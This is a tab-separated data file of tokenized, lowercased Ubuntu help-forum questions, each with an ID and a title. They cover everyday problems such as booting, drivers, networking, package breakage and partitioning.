424441	having issues installing ubuntu on surface pro	currently i am using windows 8.1 on a microsoft surface pro . i have managed to disable secure boot and create a bootable usb , but my surface pro does n't recognize the drive and boots into windows 8.1 anyway . do you have any suggestions ?
424442	what 's wrong with my meta keys ( `ctrl` & `alt` ) ? they wo n't stay down !	when i hold down ctrl or alt continuously , it occasionally behaves as if the key has been released momentarily . the easiest way to demonstrate this is i enable the setting which displays an indicator around the mouse pointer when the ctrl key is pressed and released . if i hold the ctrl key down continuously , the indicator will appear at random intervals just like it happens when i release the key . another way is to type some long string on the command line such as the the the the ă 100 and use ctrl-f , alt-f , ctrl-b , or ctrl-f to move through the line . the cursor will stop at random places in the string . this , of course , is frustrating when using ctrl-f or similar to move through a lot of text in emacs because it will leave random fs in the text ! what i 've tried : verified that it 's not a hardware issue . i tried swapping the ctrl key with other keys via keyboard settings , but it still happens . i 've tried to see if other keys ( not mapped as ctrl ) exhibit the same problem , but it does n't seem to be the case verified that it happens when logged in as root enabled then disabled various universal access settings ? ? ? i have no idea what else to try . other things i 've noticed that may or may not be related : the behaviour of copy/paste has changed for some programmes . for example , in chrome , if i highlight some text , the highlight colour is orange . but when i press ctrl , and before c to copy , the highlight color changes to gray . if i 'm highlighting a css attribute in the developer tools console in order to change or copy it , as soon as i press ctrl , it becomes unhighlighted as if i 've pressed esc an onscreen keyboard now appears on the lock screen when i log in . i ca n't find any way to disable this . hardware and software details : hardware : compaq presario v6000 software : ubuntu 12.04.4 lts ( gnu/linux 3.2.0-58-generic-pae i686 ) with gnome classic desktop
424444	ubuntu lts 12.04 - recover encrypted /home folders . iceauthority issue	after initial setup , having created some user accounts with the encrypted home option , i did a command line passwd change . this seems to cause the login password to no longer function as the decryption requires since the gui returns - could not update .iceauthority ( logout ) . i have my hexadecimal mount passphrase and am able to get to a point where ecryptfs-recover-private successfully mounts files to a /tmp directory but filenames are not discernable to me . can someone please tell me step-by-step directions to bring said user account back to normal working order ? note : i 've lost root access as well though have additional administrator accounts with sudo privileges . p.s . i think the command line password change may not update something to do with pam thereby causing my problem ? 多 ?
424445	how do i remove the window manager of a single application , or open it with no window managment ?	i need to open a window without it being managed by the window manager , while the other windows on my screen continue to be managed by the window manager , how do i do this ? p.s . i 'm willing to edit the application source code if that 's the only way , it 's written in python using pyglet .
424448	vuze wo n't let me delete anything , it says permission denied	i 'm running ubuntu 12.04 . in the vuze downloads properties , it says owner : root . i do n't know how to change that . this has only happened in ubuntu , not windows .
424449	dell xps l502x component driver support and mouse pointer stuck	i 'm new user at ubuntu .inatall ubuntu 12.10 on my dell xps l502x system but after installation mouse pointer became unresponsive and give me support for graphice , sound etc
424454	bluetooth wo n't find devices !	so the other day , i turned-off bluetooth via the system tray to save power ... when i connected to mains power again , i was unable to turn bluetooth back on through either the system tray or the bluetooth settings , though this was rectified after a restart . following this was ubuntu 's refusal to work with any of my ( previously ) paired bluetooth devices ... it showed them in the list as before , by simply would not connect to them . in an attempt to rectify this issue , i deleted my bluetooth devices with the intention of pairing them again ... but now ubuntu wo n't `` find '' any devices ! as a test , i also made ubuntu discoverable so that other bluetooth devices can `` see '' it and interestingly , none of my other bluetooth devices can `` see '' ubuntu ... i 'm not too sure what 's going on , but any help would be appreciated .
424456	linux headers not upgrading . it says `` no space '' when i have lots	problems with my linux-headers in a ubuntu 13.10 upgrade . it says : e : / var/cache/apt/archives/linux-headers-3.11.0-15_3.11.0-15.25_all.deb : unable to create `/ usr/src/linux-headers-3.11.0-15/arch/powerpc / kernel / makefile.dpkg-new ' ( while processing `./usr/src/linux-headers-3.11.0-15/arch/powerpc/kernel/makefile ' ) : device with no free space e : / var/cache/apt/archives/linux-headers-3.11.0-15-generic_3.11.0-15.25_i386.deb : unable to create `/ usr/src/linux-headers-3.11.0-15-generic / include / config / dm / multipath / ql.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.11.0-15-generic/include/config/dm/multipath/ql.h ' ) : device with no free space but i have a / with 18 gb of space ... during the this happened : ( reading database ... 244 922 files and directories currently installed . ) preparing to replace linux -image - 3.11.0 -15- generic 3.11.0-15.25 ( using ... / linux - image- 3.11.0 -15- generic_3.11.0 - 15.25_i386.deb ) ... done . the unpack replacement linux - image- 3.11.0 -15- generic ... examining / etc / kernel / postrm.d . run- parts : executing / etc / kernel / postrm.d / initramfs -tools 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postrm.d / zz - update- grub 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic preparing to replace linux - headers -3.11.0-15 3.11.0-15.25 ( using ... / linux - headers - 3.11.0 - 15_3.11.0 - 15.25_all.deb ) ... the unpack replacement linux - headers - 3.11.0 -15 ... dpkg : error processar / var/cache/apt/archives/linux-headers-3.11.0-15_3.11.0-15.25_all.deb ( - unpack ) : no . managed to create ` / usr/src/linux-headers-3.11.0-15/arch/powerpc/kernel/makefile.dpkg-new ' ( ` wile processing ./usr/src/linux-headers-3.11.0-15 / arch / powerpc / kernel / makefile ' ) : no free space on device no apports paper written for maxreports was reached dpkg - deb : error : the necklace was killed subprocess hair signal ( channel interrupted ) preparing to replace linux - headers - 3.11.0 -15- generic 3.11.0-15.25 ( using ... / linux - headers - 3.11.0 -15- generic_3.11.0 - 15.25_i386.deb ) ... the unpack replacement linux - headers - 3.11.0 -15- generic ... dpkg : error processing / var/cache/apt/archives/linux-headers-3.11.0-15-generic_3.11.0-15.25_i386.deb ( - unpack ) : no . managed to create ` / usr/src/linux-headers-3.11.0-15-generic/include/config/dm/multipath/ql.h.dpkg-new ' ( enquanto processava ` . / usr / src / linux - headers -3.11.0-15-generic/include/config/dm/multipath/ql.h ' ) : no free space on device no apports paper written for maxreports was reached dpkg - deb : error : the necklace was killed subprocess hair signal ( channel interrupted ) preparing to replace linux -image - extra- 3.11.0 -15- generic 3.11.0-15.25 ( using ... / linux - image- extra- 3.11.0 -15- generic_3.11.0 - 15.25_i386.deb ) ... the unpack replacement linux - image- extra- 3.11.0 -15- generic ... examining / etc / kernel / postrm.d . run- parts : executing / etc / kernel / postrm.d / initramfs -tools 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postrm.d / zz - update- grub 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic foramen found errors while processing : / var/cache/apt/archives/linux-headers-3.11.0-15_3.11.0-15.25_all.deb / var/cache/apt/archives/linux-headers-3.11.0-15-generic_3.11.0-15.25_i386.deb w : he waited for dpkg - assert - multi- arch but was n't wool - dpkggo ( 10 : no . exist processes son ) e : sub - process / usr / bin / dpkg returned an error code ( 1 ) the package failed to install . trying to recover : installing linux - image- 3.11.0 -15- generic ( 3.11.0-15.25 ) ... running depmod . update- initramfs : deferring update ( hook will be called later ) not updating initrd symbolic links since we are being updated / reinstalled ( 3.11.0-15.25 was configured last , according to dpkg ) not updating image symbolic links since we are being updated / reinstalled ( 3.11.0-15.25 was configured last , according to dpkg ) examining / etc / kernel / postinst.d . run- parts : executing / etc / kernel / postinst.d / apt self- removal - 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / initramfs -tools 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic update- initramfs : generating / boot/initrd.img-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / pm - utils 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / update- notifier 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / zz - update- grub 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic generating grub.cfg ... found linux image : / boot/vmlinuz-3.11.0-17-generic found initrd image : / boot/initrd.img-3.11.0-17-generic found linux image : / boot/vmlinuz-3.11.0-15-generic found initrd image : / boot/initrd.img-3.11.0-15-generic found memtest86 + image : / memtest86 + . bin done installing linux - image- extra- 3.11.0 -15- generic ( 3.11.0-15.25 ) ... running depmod . update- initramfs : deferring update ( hook will be called later ) not updating initrd symbolic links since we are being updated / reinstalled ( 3.11.0-15.25 was configured last , according to dpkg ) not updating image symbolic links since we are being updated / reinstalled ( 3.11.0-15.25 was configured last , according to dpkg ) examining / etc / kernel / postinst.d . run- parts : executing / etc / kernel / postinst.d / apt self- removal - 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / initramfs -tools 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic update- initramfs : generating / boot/initrd.img-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / pm - utils 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / update- notifier 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic run- parts : executing / etc / kernel / postinst.d / zz - update- grub 3.11.0 -15- generic / boot/vmlinuz-3.11.0-15-generic generating grub.cfg ... found linux image : / boot/vmlinuz-3.11.0-17-generic found initrd image : / boot/initrd.img-3.11.0-17-generic found linux image : / boot/vmlinuz-3.11.0-15-generic found initrd image : / boot/initrd.img-3.11.0-15-generic found memtest86 + image : / memtest86 + . bin done i 've uninstalled 3.11.0-15 and installed 3.11.0-17 with synaptic . after this , i 've done the folowing . ~ $ df -h file sist . size ocup free use % mouted in /dev/sda6 19g 6,1g 12g 35 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 3,9g 4,0k 3,9g 1 % /dev tmpfs 801m 1,2m 799m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 4,0g 216k 4,0g 1 % /run/shm none 100m 32k 100m 1 % /run/user /dev/sda1 270m 34m 218m 14 % /boot /dev/sda7 550g 497g 26g 96 % /home and ~ $ df -hi file sist . inodes iocup ifree usei % mounted in /dev/sda6 1,2m 1,2m 27k 98 % / none 197k 2 197k 1 % /sys/fs/cgroup udev 193k 501 192k 1 % /dev tmpfs 197k 529 197k 1 % /run none 197k 3 197k 1 % /run/lock none 197k 8 197k 1 % /run/shm none 197k 23 197k 1 % /run/user /dev/sda1 72k 265 72k 1 % /boot /dev/sda7 35m 619k 35m 2 % /home after the kernel install , my nautilus does n't empty the trash , it crashes , and dropbox , every time i boot my computer , it ask me for root previleges ( ask for root password ) and does n't shows on tray . thanks !
424460	why ca n't i see gnome extensions ?	i have installed ubuntu 13.10 with gnome 3.8.4 and i 'm trying to install some gnome extensions . now , some of them are installed but do n't work or i ca n't see them . for example i tried to install `` sensors '' and it does n't work . what can i do ?
424464	hybrid cloud automation using ubuntu juju	i am administrator who helps to deploy cloud services to an organisation . is it possible to use juju to deploy services based on user requests . kindly answer my following doubts . users use a web interface to request for a service . is it possible to deploy the services automatically using juju ? based on the user requests we can deploy services using juju . after the deployment we want to allocate the virtual machine and service to the requested user . how to create a user name and password to the deployed virtual machine/ service ? which is the best programming language which supports juju api ? we are planning to create a hybrid service deployment using juju . using web interface users can select which public cloud they want to use to deploy the services . how to deploy a particular cloud service to specific public cloud service provider ? ? kindly help to solve my queries .
424466	how to add two ipv6 dns-nameservers into /etc/network/interfaces ?	with ipv4 , i can add two dns name servers without any problem , like this : '' dns-nameservers 8.8.4.4 8.8.8.8 '' then on my resolv.conf i got : nameserver 8.8.4.4 nameserver 8.8.8.8 but , it does not work for ipv6 , only the first ipv6 dns server appear at my resolv.conf , look : '' dns-nameservers 2001:4860:4860 : :8844 2001:4860:4860 : :8888 '' but then , my resolv.conf remain only with the first one : nameserver 2001:4860:4860 : :8844 apparently , ubuntu ( resolvconf / ifupdown ) is ignoring the second dns name server , so , how to fix it ? ! edited : here is my /etc/network/interfaces file : auto lo iface lo inet loopback iface lo inet6 loopback auto eth0 iface eth0 inet6 static address 2800:210:0:4 : :2 netmask 64 gateway 2800:210:0:4 : :1 dns-nameservers 2001:4860:4860 : :8844 2001:4860:4860 : :8888 tks ! thiago
424471	automatic installation of ubuntu 12.04 with kickstart in web	i am going to install ubuntu 12.04 in virtualbox with ubuntu alternate iso file and ks.cfg file hosted in local server . i am supplying ks=192.168.1.4:8080/ks.cfg as kernel paramter but still the ubuntu intallation is asking questions for language keyboard and everything as it would ask without kickstart . please help . ks.cfg # platform=x86 , amd64 , or intel em64t # version=devel # firewall configuration firewall -- disabled # install os instead of upgrade install # use cdrom installation media cdrom # root password rootpw -- plaintext vagrant # system authorization information auth -- useshadow -- passalgo=sha512 # use text mode install text # system keyboard keyboard us # system language lang en_us # selinux configuration selinux -- disabled # do not configure the x window system skipx # installation logging level logging -- level=info # reboot after installation reboot # system timezone timezone -- isutc africa/abidjan # network information network -- bootproto=dhcp -- device=eth0 -- onboot=on # system bootloader configuration bootloader -- location=mbr # clear the master boot record zerombr # partition clearing information clearpart -- all -- initlabel
424472	i have 3 different distros in use and i want to refer 3 transmissions to one config file ?	on my machine , 3 different linux distributions are installed : ubuntu + magiea gnome + manjaro kde i use a torrent client ( called transmission ) within them . so i want to use one config directory for all of these transmisions . now , those 3 transmissions use 3 different directories : /home/ubuntu-user/.config/transmission /home/magiea-user/.config/transmission /home/manjaro-user/.config/transmission i want to force the 2 else ones to use this directory as config-directory : /home/ubuntu-user/.config/transmission
424474	how can i give internet priority to wifi instead of ethernet ?	i have an old acer laptop ( aspire 5315-2077 . ) i 'm using it to mainly browse the internet with while i 'm using my more powerful system for gaming . i connect to the internet via wifi on the ubuntu system . i also have a wired lan that does not connect to the internet . if plug the ethernet cable into the lan port on the laptop the wifi suddenly drops connection to the internet . i unplug it and i get internet . i suspect that ubuntu assumes that the wired network is faster for internet and assigns a higher priority to it . in my case , however , i need to keep priority on wifi for internet . windows 7 allows me to assign a value to what 's called an `` interface metric '' no each of my connections . how can i do the same with ubuntu 13.04 's connections ? i have been looking for a solution for awhile and have not found it . i have found it is possible but , the person just asked if it was possible in their question and all the answers were basically yes without further explanation as to how . i am quite a novice with linux distros so , i do n't have much more info about my configuration . thank you for your help .
424476	ubuntu install broken after adding a `` jessie '' debian repository	i was trying to build pfff to use scheck and a requirement for the compiler is version 4+ of ocaml . the versions available to my apt-get seem to indicate 3.12.1 and the build was n't working . now i do n't know what sid , jessie and the other names were but it said that version 4.0.1 was available but not stable if you add `` jessie '' . i assume that jessie is a codename for unstable releases of gnu software or something ? i added this deb http : //ftp.nz.debian.org/debian jessie main to my sources.list and ran apt-get install ocaml and voilă it found the new version . i had a bit of a worry that it would try to update other dependencies and it did , but i let it run . one of the dependencies was libc6 and before it finished it told me that my install was broken and the software could not fix itself . now i removed the entry from my sources.list and tried to run apt-get install ocaml again but it 's complaining of all sorts of version problems , a program called locales is apparently causing a lot of strife and libc6.1 too . how do i remedy this ? i 'm running 12.04 precise pangolin . i have a feeling i 'm misunderstanding something pretty fundamental about this whole thing . how do i install a debian package on my ubuntu system without having to screw everything else that 's installed , up ?
424482	can i create another partition on a single partition system ?	i have a system running ubuntu 13.10 in a single partition . i need to create another ext4 partition , is it possible without reinstalling ubuntu ? please show me the procedure , if it is possible .
424485	stop process on power button press	i have an old ubuntu pc running a minecraft server , but i only want it on at certain times . i want to be able to turn it on and off using only the power button . i am able to turn it on , but to turn it off requires the command 'stop ' in the console to shut the server down . is there any way to tell it to enter the stop command when the power button is pressed , then after a time ( a minute or so ) turn the computer off ? thanks in advance : )
424486	ubuntu.com server not accessed from laptop	using ubuntu on memory stick as trial - ubuntu goes out to web when there is a lan connection direct to router via ethernet cable but ca n't ca n't get out to web wirelessly via the hp notebook 's intel ( r ) pro/wireless 3945 abg network connection 802.11b/g ) . - ubuntu does n't seem to `` see '' the wireless adapter - firefox , google , whatever say `` ca n't find the server at start.ubuntu.com '' because they 're not getting a web connection . what to do now ? ? thanks .
424488	switching between active rdp 's via reminna ( how-to )	i often use rdp to remotely connect windows servers & ssh to linux distro ( s ) . as the subject explains ; i always wondered how to to switch between active rdp windows . i 'm using the default client remmina as it serves my purpose very well . but the only problem is that , i 'm lost when i need to switch active windows in between . to make this more clear ; when i rdp to windows pc1 , it connects perfectly . and then when i connect to windows pc2 whilst having pc1 , yes it indeed connects as the same . but , soon after when i try to check for an option to switch between those two , i 'm lost . does n't matter how many rdp sessions i make as it connects to the requested server perfectly . despite having many connected windows , i always need to close each and every connected sessions to go back to the other active session . p.s . : though it looks simple , i do n't want to keep on connecting to each machines multiple times by closing it . my requirement is to switch active windows without having to close and connect again . i 'm sure there 'll be a way to do this .
424489	do i need to install any drivers for 2 finger swipe	i am able to use 2 finger swipe and 2 finger tap in my laptop running win8 but it is not working in ubuntu 12.04 . should i install any additional drivers or is it a limitation of ubuntu ?
424491	ndiswrapper fails when ipod is plugged in . i have no idea how to fix this	when i plug my ipod into my pc , ndiswrapper fails to detect my wifi adapter and as long as my ipod is plugged in , i can not access the internet because of that . when i unplug my ipod , it reconnects to the internet just as usual . system info : pentium 4 @ 3ghz 1026mb ddr 400mhz ram nvidia geforce fx 5200 netgear wnda3100 wifi adapter
424492	how to remove packages from the apt cache that are not currently installed ?	i want to organise my apt cache folder so i want to remove packages that are not currently installed and keep packages that are only currently installed
424496	can not install programs through terminal on ubuntu 12.0.4	i recently made ubuntu 12.0.4 bootable through my flashdrive . i 've done this before , and have had no problems on previous flashdrives ; the only problem i ran into then was i ran out of space , and now i reformatted my flashdrive to give me more space . the program i am trying to install is wine 1.7 , and the instructions given here are n't working for me this time . when i try and install it through terminal , i get this message every time : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-amd64 ( = 1:1.7.12-0ubuntu1 ) but it is not going to be installed depends : wine1.7-i386 ( = 1:1.7.12-0ubuntu1 ) recommends : fonts-droid but it is not installable recommends : ttf-mscorefonts-installer but it is not installable recommends : fonts-horai-umefont but it is not installable recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . if anyone knows what this means i 'd appreciate it .
424498	upgrading from 12.10 to 13.10	i want to upgrade from ubuntu 12.10 to 13.10 but i had question when upgrading does the data get removed or should we make backup of it or can we install just like that
424502	how to create a command toggle ?	i have a launcher currently on my xfce panel that i would like to open a window . however , i want to make it only open the window if no other instance is running . if an instance is running , the windows would close upon a press of the launcher . i think that this could be possible with a toggle of the command -- if running , close , and if closed , run . how can i achieve this ?
424504	ubuntu installer crashes when clicking next on install ubuntu alongside windows	in installation ( install ubuntu within windows screen ) , my computer reboots after i click continue . i tried 12.10- 12.04 and 11.04 with more than once .iso files and dvds and even my pen drive . even wubi ca n't install ubuntu on my computer . but i always been able to install it on my current computer so it makes no sense . is there a way i can continue using ubuntu ? core i3 2.4 ghz hdd radeon 5470m 2gb ddr3 ram
424507	symlinks broken burning iso to cd	for a while now i 'm having the strangest problem , which has turned a stack of about 10 cd-rs into coasters . i 'm trying to burn a bootable iso , a support software for the serveraid controller in my ibm x345 box . no matter what program i use to burn the iso ( cdrecord [ raw96r , raw96p ] , imgburn , nero , cdburnerxp ) , the symlinks in /lib are coming out broken . for example , /lib/libncurses.so.5.2 will be right there , but /lib/libncurses.so.5 , which should be a symlink to the actual library , will have size 0 . obviously this crashes the boot process at some point . sudo cdrecord -v -speed=1 -dev=/dev/sg0 -raw96r /tmp/ibm_fm_srsupp_7_12_14_anyos_32-64.iso my last resort idea was to mount the iso locally , then create a new iso out of the directory tree . have n't had much success with this either , but that may be because i 'm creating the iso in the wrong way ( ? ) : sudo genisoimage -no-emul-boot -c bootcd/isolinux/boot.catalog -input-charset iso8859-1 -output-charset iso8859-1 -r -u -b bootcd/isolinux/vmlinuz -hide /mnt/ibm_cd/bootcd/vmlinuz2 -v `` serveraid_v7_12_14 '' -iso-level 3 -o /tmp/ibm_cd2.iso /mnt/ibm_cd/ several previous versions from ibm are doing the same thing , so i have to assume that the problem is on my side . see e.g . : http : //www-947.ibm.com/support/entry/portal/docdisplay ? lndocid=migr-60624 ( preferred ) http : //www.ibmquicklinks.com/downloads/downloads/ibm/serveraid/ ( other versions ) my infinite gratitude to them who can work out this conundrum !
424511	ubuntu 12.04 - no logon screen	i 'm new to ubuntu , so bare with me : ) after configuring xrdp my machine does n't boot to the logon screen anymore . how can i get it to boot normally again ? -i 'm able to ping , and connect to my shares on the machine thanks in advance for your help and time ,
424515	i want to list what drives are visible on my local network	i have several computers and they are shared to the local network . now i have an ubuntu installed in my laptop and i would like to access those shares but i do not see them and do not get their ip number so i can not mount them either in an easy way !
424520	how to shut down the system	how do i turn ubuntu off ? i ca n't find a button called shut down or turn off .
424521	how do install a adobe flash player in ubuntu 13.10 for chromium	i have just downloaded install_flash_player_linux.11_x86_tar.gz from the adobe website . how do i install this package or any other package not found in the ubuntu software center . i have used sudo apt-get install ubuntu-restricted-extras . rebooted and flash is not working .
424523	changing to ubuntu 12.04	i am a competent computer user who currently uses mac for several main task , ( i will cover them in a bit ) . i am looking into the possibility of transferring over to ubuntu 12.04 . primarily i want my new set up to act and behave seamlessly , with the added option to tinker play and develop it during my spare time . in no particular order it must : word processing ( compatability with microsoft office ) presentations and spreadsheets photo and video editing software code development ( mainly on arduino and rpi ) edit and annotate pdfs print and scan documents print to pdf normal ssh etc options access online cloud storage , ie dropbox , google drive i have been experimenting with this distro as a virtual machine and am quite happy so far . i will be using this computer during the day at work , i know it 'll be far more capable than me . i do n't want to keep paying mac prices for fashionable computers that only ever get used in coffee shops and i certainly wo n't go back to windows ! are my expectation too much ? is the above list possible ? and will it allow my knowledge to grow ? i have tried to be specific i what i want . share your opinions and thoughts whether all this is possible .
424527	remove favorites from sidebar	i followed the tutorial lifehacker gave about dual-booting win 7 and ubuntu but when i come to ubuntu i ca n't remove my inner documents and music libraries in favour of my common libraries store in another partition . how can i remove them from sidebar ? should i ask for extra permissions or type my password anywhere ? thanks edit : i have no problem accessing the storage or accessing my files . the thing i want is to remove the default libraries from the sidebar i see then i open any folder and to add instead of them my folders ( located on storage partition )
424528	no hdmi sound in ubuntu 13.10	i made a fresh install of ubuntu 13.10 on my desktop . i have a problem with the sound . as you can see from the screenshot , ubuntu detected my `` hdmi sound card '' that is onboard the gigabyte ga-ma78g-ds3h motherboard . it appears on card 1 . i do not see it on `` play sound through '' ( screenshot ) , and thus , can not select it as the output for audio . i connected my computer to the tv via an hdmi cable , and the video is fine , but there is no sound . how can i get ubuntu to install my hdmi sound card on `` play sound through '' , so i can select it and get sound out ? dear wilf . i 'm new to askubuntu , so here is a link to the screenshots . hope you can see them . i have an integrated ati radeon hd 3200 graphics card on moatherboard . georg https : //plus.google.com/photos/102984125071432149914/albums/5983280717706993697 hello terminal . i installed the `` pulse audio volume control '' , but it did not help . i still do not get sound from my hdmi . george
424534	how to install blackberry tools on ubuntu 13.10	how can i install blackberry tools ? i have ubuntu 13.10 . when i launch start.exe , the answer is error loading archaive please , be so kind , and help me . thank you in advance .
424536	problem using acpi_call_gui on dell inspiron n5110	i just installed acpi_call_gui on my laptop using this guide . ( in order to switch off discrete graphics at every boot ) now when i run the software , i click to install acpi_call . after that it asks me for a code corresponding to my laptop model + a web page opens . in that web page i cant find my laptop model mentioned there . i have dell inspiron n5110 ( with nvidia gt 525m ) and here is the list provided by the software . i ca n't find my laptop model mentioned on that page . does that mean my laptop model is not supported ? if it is supported , what code should i input to the s/w ?
424538	ubuntu sdk html5 applicaitons miss some basic effcts of normal html in web browsers !	i download and install the newest ubuntu sdk ( 1.097~sdkppa~saucy1~test9 ) in ubuntu 13.10 . i just create a native app with ubuntu html5 apis , but find that it miss some basic effects/behaviors of normal html in web browsers ! here are what i have done : step 1 : create a html5 applications from `` new file or project ... '' menu . in the dialog , choose `` applications '' form projects bar and select `` html5 applications '' step 2 : edit the built-in html file of the project . just copy the html and js files from another demo project which is also created from `` new file or project ... '' menu . in the dialog , choose `` ubuntu '' from projects bar and select `` html5 app '' . one index.html file and js directory will be created . then copy them to the first project . step 3 : edit index.html file to add onmouseover and onmouseout event to the test button test normal behaviors of html ! function change ( ) { document.getelementbyid ( `` text1 '' ) .style.background= '' red '' ; } function change2 ( ) { document.getelementbyid ( `` text1 '' ) .style.background= '' yellow '' ; } step 4 : run the app and move the mouse on the test button . however nothing happens ! but when i click the test button , the color of the button changed . i think some events must be intercepted by the wrapper of the app . and i wonder how could i get the excepted effects ? i need this function to give a float hint to the users . the whole codes can be download from here : http : //yunpan.cn/q4fp9pericpbw
424543	lubuntu panel does not take on system theme colour	i installed a gtk 2 ambiance like theme on ubuntu 13.10 running the lubuntu desktop and when i set the panel to take the system theme only the indicator applet changed to take on the theme colour . how can i get the rest of the panel to take the theme ?
424545	booting monolithic kernel : can not find root fs by uuid	i have built a monolithic kernel with the grsecurity patch , since i do n't need many modules for the system and i need to optimize space . when trying to boot the new kernel , it yields a busybox shell , claiming the root filesystem could not be found by its uuid : /dev/disk/by-uuid/7b30b4c6- ... the chipset is supported by the kernel ( supermicro server ) : 00:00.0 host bridge : intel corporation xeon e3-1200 v2/ivy bridge dram controller ( rev 09 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.6 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 7 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation c202 chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 02:00.0 ethernet controller : intel corporation 82574l gigabit network connection 03:00.0 ethernet controller : intel corporation 82574l gigabit network connection 04:03.0 vga compatible controller : matrox electronics systems ltd. mga g200ew wpcm450 ( rev 0a ) i confirmed that the uuid exists properly , via blkid : /dev/sda1 : uuid= '' 0a46c81f- ... '' type= '' ext2 '' /dev/sda5 : uuid= '' vpqhtm- ... '' type= '' lvm2_member '' /dev/mapper/blah -- vg-root : uuid= '' 7b30b4c6- ... '' type= '' ext4 '' therefore the lvm volume group and the correct volume with the requested uuid are present . i can boot the normal modular kernel just fine . what is wrong ? edit : the lvm config is fine , still no devmapper nodes ? : ( initramfs ) lvm vgdisplay -- - volume group -- - vg name xxx-vg system id format lvm2 metadata areas 1 metadata sequence no 19 vg access read/write vg status resizable max lv 0 cur lv 6 open lv 0 max pv 0 cur pv 1 act pv 1 vg size 465.52 gib pe size 4.00 mib total pe 119173 alloc pe / size 119173 / 465.52 gib free pe / size 0 / 0 vg uuid xxx ( initramfs ) lvm lvscan active '/dev/xxx-vg/root ' [ 37.25 gib ] inherit active '/dev/xxx-vg/tmp ' [ 4.66 gib ] inherit active '/dev/xxx-vg/var ' [ 18.62 gib ] inherit active '/dev/xxx-vg/blah ' [ 186.26 gib ] inherit active '/dev/xxx-vg/swap ' [ 3.72 gib ] inherit active '/dev/xxx-vg/home ' [ 215.00 gib ] inherit ( initramfs ) ls /dev/mapper/ control ( initramfs ) reboot
424546	ubuntu entering shell commands when pressing keys	today when i turned on my laptop and booted into ubuntu something strange started happening . whenever i press keys on my keyboard it enters shell commands . for example , whenever i press the c or d keys it will automatically enter cd or if i hit x or s it will auto input xs even when i 'm not in the shell . does anybody know what 's going on ?
424547	erase partition and install ubuntu on entire disk	i have 2 partitions ( windows and ubuntu 13.04 ) and i am asked which one to boot each time i turn on my computer . i want to install ubuntu 13.10 to the entire disk . i do not mind if all previous ubuntu/win data are lost . how can i do that ?
424548	official download 12.04 gives 730mb	contrary to widespread information does not fit on a cd . download here was tut.fi . is there a 700mb version somewhere ?
424549	i am getting frequently low disk space message	i am frequently getting low disk space error and attached screen displayed . let me know what to do .
424553	are there problems with uefi when single-booting ubuntu ?	as some of you may know , i recently ( and unsuccessfully ! ) tried to dual-boot ubuntu with microsoft windows 8.1 on a sony vaio tap 20 ... however it was a nightmare with problem after problem and being that only the kids use that particular computer , i went back to a windows 8.1-only setup . now with my personal computer however , i dual-boot ubuntu and windows 8.1 fine ( spending most of my time in the former ) ... however it is a much older laptop that is on its last legs and eventually i will need to replace it , almost certainly with a uefi-based computer ( seeing as that is what is replacing the bios in all computers over the next few years ) . -- now that the back-story is out of the way , i have a really , really easy question ( well , at least i think it is ) ... -- if i single-boot a future computer with ubuntu , do all of the uefi issues simply `` go away '' ? or will this vary from manufacturer to manufacturer ( as is the case with dual-booting ) ? i 've learnt quite a bit about uefi over the last few weeks and as i understand it , a lot of the booting problems come down to windows 8.1 modifying the boot sequence when dual-booting ... effectively undoing some or all of the changes a ubuntu may have made . but if windows 8.1 has been removed ( along with all of its partitions , including the `` recovery '' partitions ) , there should be no difference to single-booting a bios-based computer with ubuntu , right ?
424555	how can i open thunderbird in the system tray with a command	how can i open thunderbird minimized with a command ? nohup thunderbird & does n't work with it , while it works with skype and amarok ...
424559	trigger a command in ubuntu/linux whenever a new file is created in a directory	how could i trigger a command in ubuntu/linux , whenever a new file is created in a directory by a java webapp ? usage/context : i need to move a newly created file ( created by java app ) , in a directory to amazon s3 using s3cmd command .
